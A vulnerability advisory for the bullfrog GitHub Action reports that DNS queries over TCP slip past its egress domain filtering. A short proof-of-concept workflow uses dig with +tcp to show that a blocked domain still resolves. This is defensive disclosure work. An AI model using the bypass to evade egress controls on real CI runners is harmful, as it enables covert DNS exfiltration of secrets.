CVE-2025-47775 – bullfrogsec/bullfrog
Package
Manager: github_actions
Name: bullfrogsec/bullfrog
Vulnerable Version: >=0 <0.8.4
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS: 0.00048 pctl0.14411
Details
Bullfrog's DNS over TCP bypasses domain filtering ### Summary Using tcp breaks blocking and allows DNS exfiltration. ### PoC ``` name: test on: push: branches: - "*" jobs: testBullFrog: runs-on: ubuntu-22.04 steps: - name: Use google dns run: | sudo resolvectl dns eth0 1.1.1.1 resolvectl status - name: Set up bullfrog to block everything uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2 with: egress-policy: block allowed-domains: | *.github.com - name: Test connectivity run: | echo testing udp allowed .. dig api.github.com @1.1.1.1 || : echo testing tcp allowed .. dig api.github.com @1.1.1.1 +tcp || : echo testing udp not allowed dig api.google.com @1.1.1.1 || : echo testing tcp not allowed dig api.google.com @1.1.1.1 +tcp || : ``` ### Impact sandbox bypass 
Metadata
Created: 2025-05-15T17:23:04Z
Modified: 2025-05-15T17:23:04Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-m32f-fjw2-37v3/GHSA-m32f-fjw2-37v3.json
CWE IDs: ["CWE-201"]
Alternative ID: GHSA-m32f-fjw2-37v3
Finding: F037
Auto approve: 1